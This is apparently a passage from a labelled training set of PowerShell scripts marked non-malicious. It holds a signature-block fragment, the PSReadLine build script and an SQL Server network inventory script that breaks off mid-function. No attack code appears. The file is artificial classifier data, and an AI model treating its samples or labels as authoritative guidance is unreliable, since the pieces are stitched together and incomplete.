HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIMT4 # YEP5fN/C2T2TWk/VBZbqAzLPux/G8dAQLB6a8cC4MEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAkQTYxZmIdCoLaOa/8aqKeuE6HqiSgwgGqrIj # 50c9n5s+4f7Cw2MX7ktpZoAaaeJqj7qCepWGcw++0iykUjmW/5KzPPaxbTu4wtsV # 86+5HrWOWnm8rSWA6rrt5qGbazaeCGaCA4Usb4aVx5lEA8zv05ZhBLKsVtZSTf59 # hz9FyEl7r0jLE3B56XyBrBVrQuOPKMcIUceVYMpQB1mNyMY8x/5q1R3nei9KO6mn # juLn1aq/RS0s8/Td3z36nG7nBkaaGDKYGRHCiPYe4YEc0McJpQVGoL2C2BEuQRBc # G5PAF9FznVhZ4f/EMyuWktjpg843x4M/IvZdvjrvnc3G5IiDoqGCFykwghclBgor # BgEEAYI3AwMBMYIXFTCCFxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFZBgsqhkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCCIpnAgLydBTM203SoBKqq1JV0t6Pj0fnNk # pUlB8EB+vwIGZk3029D6GBMyMDI0MDUyMzE2NDM0NS45MTVaMASAAgH0oIHYpIHV # MIHSMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsT # HVRoYWxlcyBUU1MgRVNOOjg2REYtNEJCQy05MzM1MSUwIwYDVQQDExxNaWNyb3Nv # ZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHdXVcd # ldStqhsAAQAAAd0wDQYJKoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAg # UENBIDIwMTAwHhcNMjMxMDEyMTkwNzA5WhcNMjUwMTEwMTkwNzA5WjCB0jELMAkG # A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQx # HjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9z # b2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMg # VFNTIEVTTjo4NkRGLTRCQkMtOTMzNTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUt # U3RhbXAgU2VydmljZTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKhO # A5RE6i53nHURH4lnfKLp+9JvipuTtctairCxMUSrPSy5CWK2DtriQP+T52HXbN2g # 7AktQ1pQZbTDGFzK6d03vYYNrCPuJK+PRsP2FPVDjBXy5mrLRFzIHHLaiAaobE5v # FJuoxZ0ZWdKMCs8acjhHUmfaY+79/CR7uN+B4+xjJqwvdpU/mp0mAq3earyH+AKm # v6lkrQN8zgrcbCgHwsqvvqT6lEFqYpi7uKn7MAYbSeLe0pMdatV5EW6NVnXMYOTR # KuGPfyfBKdShualLo88kG7qa2mbA5l77+X06JAesMkoyYr4/9CgDFjHUpcHSODuj # lFBKMi168zRdLerdpW0bBX9EDux2zBMMaEK8NyxawCEuAq7++7ktFAbl3hUKtuzY # C1FUZuUl2Bq6U17S4CKsqR3itLT9qNcb2pAJ4jrIDdll5Tgoqef5gpv+YcvBM834 # bXFNwytd3ujDD24P9Dd8xfVJvumjsBQQkK5T/qy3HrQJ8ud1nHSvtFVi5Sa/ubGu # YEpS8gF6GDWN5/KbveFkdsoTVIPo8pkWhjPs0Q7nA5+uBxQB4zljEjKz5WW7BA4w # pmFm24fhBmRjV4Nbp+n78cgAjvDSfTlA6DYBcv2kx1JH2dIhaRnSeOXePT6hMF0I # l598LMu0rw35ViUWcAQkUNUTxRnqGFxz5w+ZusMDAgMBAAGjggFJMIIBRTAdBgNV # HQ4EFgQUbqL1toyPUdpFyyHSDKWj0I4lw/EwHwYDVR0jBBgwFoAUn6cVXQBeYl2D # 9OXSZacbUzUZ6XIwXwYDVR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3Nv # ZnQuY29tL3BraW9wcy9jcmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3JsMGwGCCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1l # LVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUB # Af8EDDAKBggrBgEFBQcDCDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQAD # ggIBAC5U2bINLgXIHWbMcqVuf9jkUT/K8zyLBvu5h8JrqYR2z/eaO2yo1Ooc9Shy # vxbe9GZDu7kkUzxSyJ1IZksZZw6FDq6yZNT3PEjAEnREpRBL8S+mbXg+O4VLS0LS # mb8XIZiLsaqZ0fDEcv3HeA+/y/qKnCQWkXghpaEMwGMQzRkhGwcGdXr1zGpQ7HTx # vfu57xFxZX1MkKnWFENJ6urd+4teUgXj0ngIOx//l3XMK3Ht8T2+zvGJNAF+5/5q # Bk7nr079zICbFXvxtidNN5eoXdW+9rAIkS+UGD19AZdBrtt6dZ+OdAquBiDkYQ5k # VfUMKS31yHQOGgmFxuCOzTpWHalrqpdIllsy8KNsj5U9sONiWAd9PNlyEHHbQZDm # i9/BNlOYyTt0YehLbDovmZUNazk79Od/A917mqCdTqrExwBGUPbMP+/vdYUqaJsp # upBnUtjOf/76DAhVy8e/e6zR98PkplmliO2brL3Q3rD6+ZCVdrGM9Rm6hUDBBkvY # h+YjmGdcQ5HB6WT9Rec8+qDHmbhLhX4Zdaard5/OXeLbgx2f7L4QQQj3KgqjqDOW # InVhNE1gYtTWLHe4882d/k7Lui0K1g8EZrKD7maOrsJLKPKlegceJ9FCqY1sDUKU # hRa0EHUW+ZkKLlohKrS7FwjdrINWkPBgbQznCjdE2m47QjTbMIIHcTCCBVmgAwIB # AgITMwAAABXF52ueAptJmQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UE # BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc # BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0 # IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1 # WhcNMzAwOTMwMTgzMjI1WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O # 1YLT/e6cBwfSqWxOdcjKNVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZn # hUYjDLWNE893MsAQGOhgfWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t # 1w/YJlN8OWECesSq/XJprx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxq # D89d9P6OU8/W7IVWTe/dvI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmP # frVUj9z6BVWYbWg7mka97aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSW # rAFKu75xqRdbZ2De+JKRHh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv # 231fgLrbqn427DZM9ituqBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zb # r17C89XYcz1DTsEzOUyOArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYcten # IPDC+hIK12NvDMk2ZItboKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQc # xWv2XFJRXRLbJbqvUAV6bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17a # j54WcmnGrnu3tz5q4i6tAgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQAB # MCMGCSsGAQQBgjcVAgQWBBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQU # n6cVXQBeYl2D9OXSZacbUzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEw # QTA/BggrBgEFBQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9E # b2NzL1JlcG9zaXRvcnkuaHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQB # gjcUAgQMHgoAUwB1AGIAQwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/ # MB8GA1UdIwQYMBaAFNX2VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJ # oEeGRWh0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01p # Y1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYB # BQUHMAKGPmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9v # Q2VyQXV0XzIwMTAtMDYtMjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3h # LB9nATEkW+Geckv8qW/qXBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x # 5MKP+2zRoZQYIu7pZmc6U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74p # y27YP0h1AdkY3m2CDPVtI1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1A # oL8ZthISEV09J+BAljis9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbC # HcNhcy4sa3tuPywJeBTpkbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB # 9s7GdP32THJvEKt1MMU0sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNt # yo4JvbMBV0lUZNlz138eW0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3 # rsjoiV5PndLQTHa1V1QJsWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcV # v7TOPqUxUYS8vwLBgqJ7Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A24 # 5oyZ1uEi6vAnQj0llOZ0dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lw # Y1NNje6CbaUFEMFxBmoQtB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB # 0jELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl # ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMk # TWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1U # aGFsZXMgVFNTIEVTTjo4NkRGLTRCQkMtOTMzNTElMCMGA1UEAxMcTWljcm9zb2Z0 # IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUANiNHGWXbNaDPxnyi # DbEOciSjFhCggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAN # BgkqhkiG9w0BAQUFAAIFAOn5xLEwIhgPMjAyNDA1MjMyMTM1NDVaGA8yMDI0MDUy # NDIxMzU0NVowdDA6BgorBgEEAYRZCgQBMSwwKjAKAgUA6fnEsQIBADAHAgEAAgIB # /DAHAgEAAgIRTzAKAgUA6fsWMQIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEE # AYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GB # AFDLeDe0dFbkjsDDQNDGAJrNgLPWiHyr2giuOartGegXkwQE+cXDi+tM7h7fBh2B # bYNo0+KYUh3a3bbEHXoGDJCkFldnC2IyeF2ulROhFL674GZr0veOTkUTuDrCr6qZ # Pmf5p11f2NrqIjHtDb9qkZJmoMWW/64q51D6lA89AcPIMYIEDTCCBAkCAQEwgZMw # fDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl # ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMd # TWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAHdXVcdldStqhsAAQAA # Ad0wDQYJYIZIAWUDBAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRAB # BDAvBgkqhkiG9w0BCQQxIgQgJpgfoRHa652lWJAh5wBrVZC4KKJD+7OGlcNmhB8o # EqUwgfoGCyqGSIb3DQEJEAIvMYHqMIHnMIHkMIG9BCBh/w4tmmWsT3iZnHtH0Vk3 # 7UCN02lRxY+RiON6wDFjZjCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBD # QSAyMDEwAhMzAAAB3V1XHZXUraobAAEAAAHdMCIEILdx7+ye1frhhBSGE65Npbr8 # RnNGllzngbCrOMpxcrMAMA0GCSqGSIb3DQEBCwUABIICAIhG02vW9b4uQpNThlrF # 7PNzVXgCSkTJVW2HiMo35oVlt50T+FGxSx407v7TsRCg8r92g93TkTJyFkE3ULlt # W9MneN0lNoHKav0kTMEhsVgXbTe7/KJyR7EhrMOJ5LWfcEoRXHzFIF+TFyopUBlp # nkiYczxeqD3wRmTB78r+/h2/bAAW8yZ3f+JGzMfeYWMzEQ++/JXwMC079+c18od8 # /mKID79qZgesraNvaTGdme3P35Cmi5ldl4dv5srM/nLKWhMnLBThbPuEBDgs5Uu7 # kx/6sLtPdPwFREkqEjOMJDy6n+dXijbbup0IOUWCffHXtVOpmkLyObsmBxdv7OdO # wFkoaIvIPLVwDaZRXwEDRkXn8EXCv/ga+7ePNYamggITmqiTr/AihRpS9lgmW1TU # 4fedTRvZuH1na/cuNj9WK0fBmdTRqqvVzzfSjoglYBG8ndKHHEJsIrtmgOln4xUQ # WKYBqbwU9pSgfjaOyi/iWYcqVOtDXXnNcE1t//y2Ks4+ED4vK8Zo5G/94LvNodBk # hEufZ/u9pR85OuUzfs0LS3EMp7Nkjqb0UxCfrRIKbeGEUxfuoMp7UrdMyYem3gJO # EWn4C8W1xqLSzaEUYAVP0Ib1lO8ERIKjgeX1hYkWXVYHmBt1gtgzKXisN1ag39jB # sYOpyaGD7jKw/6X/PMijCRTj # SIG # End signature block
combined_dataset/train/non-malicious/3210.ps1
3210.ps1
[CmdletBinding()] param( [switch]$Install, [ValidateSet("Debug", "Release")] [string]$Configuration = (property Configuration Release), [ValidateSet("net461", "netcoreapp2.1")] [string]$Framework ) Import-Module "$PSScriptRoot/tools/helper.psm1" $targetDir = "bin/$Configuration/PSReadLine" if (-not $Framework) { $Framework = if ($PSVersionTable.PSEdition -eq "Core") { "netcoreapp2.1" } else { "net461" } } Write-Verbose "Building for '$Framework'" -Verbose function ConvertTo-CRLF([string] $text) { $text.Replace("`r`n","`n").Replace("`n","`r`n") } $buildMamlParams = @{ Inputs = { Get-ChildItem docs/*.md } Outputs = "$targetDir/en-US/Microsoft.PowerShell.PSReadLine2.dll-help.xml" } task BuildMamlHelp @buildMamlParams { platyPS\New-ExternalHelp docs -Force -OutputPath $targetDir/en-US/Microsoft.PowerShell.PSReadLine2.dll-help.xml } $buildAboutTopicParams = @{ Inputs = { Get-ChildItem docs/about_PSReadLine.help.txt "PSReadLine/bin/$Configuration/$Framework/Microsoft.PowerShell.PSReadLine2.dll" "$PSScriptRoot/tools/GenerateFunctionHelp.ps1" "$PSScriptRoot/tools/CheckHelp.ps1" } Outputs = "$targetDir/en-US/about_PSReadLine.help.txt" } task BuildAboutTopic @buildAboutTopicParams { $psExePath = Get-PSExePath $generatedFunctionHelpFile = New-TemporaryFile & $psExePath -NoProfile -NonInteractive -File $PSScriptRoot/tools/GenerateFunctionHelp.ps1 $Configuration $generatedFunctionHelpFile.FullName assert ($LASTEXITCODE -eq 0) "Generating function help failed" $functionDescriptions = Get-Content -Raw $generatedFunctionHelpFile $aboutTopic = Get-Content -Raw $PSScriptRoot/docs/about_PSReadLine.help.txt $newAboutTopic = $aboutTopic -replace '{{FUNCTION_DESCRIPTIONS}}', $functionDescriptions $newAboutTopic = $newAboutTopic -replace "`r`n","`n" $newAboutTopic | Out-File -FilePath $targetDir\en-US\about_PSReadLine.help.txt -NoNewline -Encoding ascii & $psExePath -NoProfile -NonInteractive -File $PSScriptRoot/tools/CheckHelp.ps1 $Configuration assert ($LASTEXITCODE -eq 0) "Checking help and function signatures failed" } $binaryModuleParams = @{ Inputs = { Get-ChildItem PSReadLine/*.cs, PSReadLine/PSReadLine.csproj, PSReadLine/PSReadLineResources.resx } Outputs = "PSReadLine/bin/$Configuration/$Framework/Microsoft.PowerShell.PSReadLine2.dll" } $xUnitTestParams = @{ Inputs = { Get-ChildItem test/*.cs, test/*.json, test/PSReadLine.Tests.csproj } Outputs = "test/bin/$Configuration/$Framework/PSReadLine.Tests.dll" } $mockPSConsoleParams = @{ Inputs = { Get-ChildItem MockPSConsole/*.cs, MockPSConsole/Program.manifest, MockPSConsole/MockPSConsole.csproj } Outputs = "MockPSConsole/bin/$Configuration/$Framework/MockPSConsole.dll" } task BuildMainModule @binaryModuleParams { exec { dotnet publish -f $Framework -c $Configuration PSReadLine } } task BuildXUnitTests @xUnitTestParams { exec { dotnet publish -f $Framework -c $Configuration test } } task BuildMockPSConsole @mockPSConsoleParams { exec { dotnet publish -f $Framework -c $Configuration MockPSConsole } } task GenerateCatalog { exec { Remove-Item -ea Ignore $PSScriptRoot/bin/$Configuration/PSReadLine/PSReadLine.cat $null = New-FileCatalog -CatalogFilePath $PSScriptRoot/bin/$Configuration/PSReadLine/PSReadLine.cat ` -Path $PSScriptRoot/bin/$Configuration/PSReadLine ` -CatalogVersion 2.0 } } task RunTests BuildMainModule, BuildXUnitTests, { Start-TestRun -Configuration $Configuration -Framework $Framework } task LayoutModule BuildMainModule, BuildMamlHelp, { $extraFiles = 'PSReadLine/Changes.txt', 'PSReadLine/License.txt', 'PSReadLine/SamplePSReadLineProfile.ps1', 'PSReadLine/PSReadLine.format.ps1xml', 'PSReadLine/PSReadLine.psm1' foreach ($file in $extraFiles) { $content = Get-Content -Path $file -Raw Set-Content -Path (Join-Path $targetDir (Split-Path $file -Leaf)) -Value (ConvertTo-CRLF $content) -Force } $binPath = "PSReadLine/bin/$Configuration/$Framework/publish" Copy-Item $binPath/Microsoft.PowerShell.PSReadLine2.dll $targetDir if (Test-Path $binPath/System.Runtime.InteropServices.RuntimeInformation.dll) { Copy-Item $binPath/System.Runtime.InteropServices.RuntimeInformation.dll $targetDir } else { Write-Warning "Build using $Framework is not sufficient to be downlevel compatible" } $version = (Get-ChildItem -Path $targetDir/Microsoft.PowerShell.PSReadLine2.dll).VersionInfo.FileVersion $moduleManifestContent = ConvertTo-CRLF (Get-Content -Path 'PSReadLine/PSReadLine.psd1' -Raw) $getContentArgs = @{ Raw = $true; Path = "./bin/$Configuration/PSReadLine/Microsoft.PowerShell.PSReadLine2.dll" } if ($PSVersionTable.PSEdition -eq 'Core') { $getContentArgs += @{AsByteStream = $true} } else { $getContentArgs += @{Encoding = "Byte"} } $b = Get-Content @getContentArgs $a = [System.Reflection.Assembly]::Load($b) $semVer = ($a.GetCustomAttributes([System.Reflection.AssemblyInformationalVersionAttribute], $false)).InformationalVersion if ($semVer -match "(.*)-(.*)") { if ($matches[1] -ne $version) { throw "AssemblyFileVersion mismatch with AssemblyInformationalVersion" } $prerelease = $matches[2] $moduleManifestContent = [regex]::Replace($moduleManifestContent, "}", "PrivateData = @{ PSData = @{ Prerelease = '$prerelease' } }$([System.Environment]::Newline)}") } $moduleManifestContent = [regex]::Replace($moduleManifestContent, "ModuleVersion = '.*'", "ModuleVersion = '$version'") $moduleManifestContent | Set-Content -Path $targetDir/PSReadLine.psd1 foreach ($file in (Get-ChildItem -Recurse -File $targetDir)) { $file.IsReadOnly = $false } }, BuildAboutTopic task ZipRelease LayoutModule, { Compress-Archive -Force -LiteralPath $targetDir -DestinationPath "bin/$Configuration/PSReadLine.zip" } task Install LayoutModule, { function Install($InstallDir) { if (!(Test-Path -Path $InstallDir)) { New-Item -ItemType Directory -Force $InstallDir } try { if (Test-Path -Path $InstallDir\PSReadLine) { Remove-Item -Recurse -Force $InstallDir\PSReadLine -ErrorAction Stop } Copy-Item -Recurse $targetDir $InstallDir } catch { Write-Error -Message "Can't install, module is probably in use." } } Install "$HOME\Documents\WindowsPowerShell\Modules" Install "$HOME\Documents\PowerShell\Modules" } task Publish -If ($Configuration -eq 'Release') { $binDir = "$PSScriptRoot/bin/Release/PSReadLine" Get-ChildItem -Recurse $binDir -Include "*.dll","*.ps*1" | Get-AuthenticodeSignature | ForEach-Object { if ($_.Status -ne 'Valid') { throw "$($_.Path) is not signed" } if ($_.SignerCertificate.Subject -notmatch 'CN=Microsoft Corporation.*') { throw "$($_.Path) is not signed with a Microsoft signature" } } Get-ChildItem -Recurse $binDir -Include "*.ps*1" | Get-AuthenticodeSignature | ForEach-Object { $lines = (Get-Content $_.Path | Measure-Object).Count $fileBytes = [System.IO.File]::ReadAllBytes($_.Path) $toMatch = ($fileBytes | ForEach-Object { "{0:X2}" -f $_ }) -join ';' $crlf = ([regex]::Matches($toMatch, ";0D;0A") | Measure-Object).Count if ($lines -ne $crlf) { throw "$($_.Path) appears to have mixed newlines" } } $manifest = Import-PowerShellDataFile $binDir/PSReadLine.psd1 $version = $manifest.ModuleVersion if ($null -ne $manifest.PrivateData) { $psdata = $manifest.PrivateData['PSData'] if ($null -ne $psdata) { $prerelease = $psdata['Prerelease'] if ($null -ne $prerelease) { $version = $version + '-' + $prerelease } } } $yes = Read-Host "Publish version $version (y/n)" if ($yes -ne 'y') { throw "Publish aborted" } $nugetApiKey = Read-Host -AsSecureString "Nuget api key for PSGallery" $publishParams = @{ Path = $binDir NuGetApiKey = [PSCredential]::new("user", $nugetApiKey).GetNetworkCredential().Password Repository = "PSGallery" ReleaseNotes = (Get-Content -Raw $binDir/Changes.txt) ProjectUri = 'https://github.com/PowerShell/PSReadLine' } Publish-Module @publishParams } task Clean { git clean -fdx } task . LayoutModule, RunTests
combined_dataset/train/non-malicious/2585.ps1
2585.ps1
[string] $script:filename = "E:\Dexma\EnumSqlServer\EnumSqlServer.html"; [bool] $script:checkServices = $true; [bool] $script:getServerInfo = $true; [void][System.Reflection.Assembly]::LoadWithPartialName('Microsoft.SqlServer.ConnectionInfo'); [void][System.Reflection.Assembly]::LoadWithPartialName('Microsoft.SqlServer.Management.Sdk.Sfc'); [void][System.Reflection.Assembly]::LoadWithPartialName('Microsoft.SqlServer.SMO'); [void][System.Reflection.Assembly]::LoadWithPartialName('Microsoft.SqlServer.SMOExtended'); Add-Type @" public struct SqlServerInstance { public string Name; public string Server; public string Instance; public bool IsClustered; public string Version; public bool IsLocal; public string IpAddress; public object[] Services; public object ServerInfo; } "@; Add-Type @" public struct ServiceInfo { public string Name; public string Caption; public string StartMode; public bool Started; public string State; public string Status; public string StartName; } "@; Add-Type @" public struct SmoServerInfo { public string Edition; public string EngineEdition; public string ErrorLogPath; public string FilestreamShareName; public string RootDirectory; public string InstallDataDirectory; public string InstallSharedDirectory; public string Language; public string MasterDBPath; public string MasterDBLogPath; public string TcpEnabled; public string Version; public object[] Databases; } "@; Add-Type @" public struct DatabaseInfo { public string Name; public string Status; public string RecoveryModel; public double Size; public double SpaceAvailable; public string LastBackup; } "@; function getIpAddress { param([string] $server) [string] $addr = "no result"; $ping = New-Object Net.NetworkInformation.Ping; try { $reply = $ping.Send($server); $addr = $reply.Address; } catch { $addr = "Error while fetching address"; } $ping.Dispose(); return $addr; } function getServiceInfo { param([string] $server, [string] $service) try { $srvc = Get-WmiObject ` -query "SELECT * FROM win32_service WHERE name = '$service'" ` -computername $server ` -ErrorAction Stop; if ($srvc -ne $null) { [ServiceInfo] $info = New-Object "ServiceInfo"; $info.Name = $srvc.Name; $info.Caption = $srvc.Caption; $info.Started = $srvc.Started; $info.StartMode = $srvc.StartMode; $info.State = $srvc.State; $info.Status = $srvc.Status; $info.StartName = $srvc.StartName; return $info; } } catch { Write-Host ((Get-Date -format yyyy-MM-ddTHH:mm:ss) + ": Error fetching service info over WMI from $server") -ForegroundColor Red; } } function getServicesInfo { param([string] $server, [string] $instance) [ServiceInfo[]] $services = @(); if ((getServiceInfo $server ("PlugPlay")) -eq $null) { return; } Write-Host ((Get-Date -format yyyy-MM-ddTHH:mm:ss) + ": Fetching services from " + $server); if (($info = (getServiceInfo $server ("MsDtsServer"))) -ne $null) { $services += $info; } if (($info = (getServiceInfo $server ("MSSQLServerADHelper"))) -ne $null) { $services += $info; } if (($info = (getServiceInfo $server ("MSSQLServerADHelper100"))) -ne $null) { $services += $info; } if (($info = (getServiceInfo $server ("SQLBrowser"))) -ne $null) { $services += $info; } if (($info = (getServiceInfo $server ("SQLWriter"))) -ne $null) { $services += $info; } if (($info = (getServiceInfo $server ("MSSQL$" + $instance))) -ne $null) { $services += $info; } if (($info = (getServiceInfo $server ("SQLAgent$" + $instance))) -ne $null) { $services += $info; } if (($info = (getServiceInfo $server ("msftesql$" + $instance))) -ne $null) { $services += $info; } if (($info = (getServiceInfo $server ("MSSQLFDLauncher$" + $instance))) -ne $null) { $services += $info; } if (($info = (getServiceInfo $server ("MSOLAP$" + $instance))) -ne $null) { $services += $info; } if (($info = (getServiceInfo $server ("ReportServer$" + $instance))) -ne $null) { $services += $info; } return $services; } function getServerInfo { param([string] $instanceName) try { Write-Host ((Get-Date -format yyyy-MM-ddTHH:mm:ss) + ": Fetching smo infos from $instanceName"); $smoSrv = New-Object Microsoft.SqlServer.Management.Smo.Server $instanceName; [SmoServerInfo] $smoInfo = New-Object "SmoServerInfo"; $smoInfo.Edition = $smoSrv.Edition; if ($smoInfo.Edition -ne [string]::Empty) { $smoInfo.EngineEdition = $smoSrv.EngineEdition; $smoInfo.ErrorLogPath = $smoSrv.ErrorLogPath; $smoInfo.FilestreamShareName = $smoSrv.FilestreamShareName; $smoInfo.RootDirectory = $smoSrv.RootDirectory; $smoInfo.InstallDataDirectory = $smoSrv.InstallDataDirectory; $smoInfo.InstallSharedDirectory = $smoSrv.InstallSharedDirectory; $smoInfo.Language = $smoSrv.Language; $smoInfo.MasterDBPath = $smoSrv.MasterDBPath; $smoInfo.MasterDBLogPath = $smoSrv.MasterDBLogPath; $smoInfo.TcpEnabled = $smoSrv.TcpEnabled; $smoInfo.Version = $smoSrv.Version.ToString(); foreach ($db in $smoSrv.Databases) { [DatabaseInfo] $dbInfo = New-Object DatabaseInfo; $dbInfo.Name = $db.Name; $dbInfo.RecoveryModel = $db.RecoveryModel; $dbInfo.Status = $db.Status; $dbInfo.Size = [Math]::Round($db.Size, 1); $dbInfo.SpaceAvailable = [Math]::Round($db.SpaceAvailable / 1024.0, 1); if ($db.LastBackupDate -ne [DateTime]::MinValue) { $dbInfo.LastBackup = $db.LastBackupDate; } $smoInfo.Databases += $dbInfo; } return $smoInfo; } } catch { Write-Host ((Get-Date -format yyyy-MM-ddTHH:mm:ss) + ": Error fetching server info over SMO from $instanceName") -ForegroundColor Red; } } function getHtmlPageHeader { return ` "<!DOCTYPE HTML PUBLIC ""-//W3C//DTD HTML 4.0 Transitional//EN""><html><head> <title>Documentation of SQL Server Instances in the Local Network</title> <link rel=""stylesheet"" type=""text/css"" href=""EnumSqlServer.css""></link></head><body> <table class=""docTable""> <tr><td class=""docHeader"">Documentation of SQL Server Instances in the Local Network<br><br></td> </tr><tr><td>Document Created: " + (Get-Date -Format yyyy-MM-dd) + 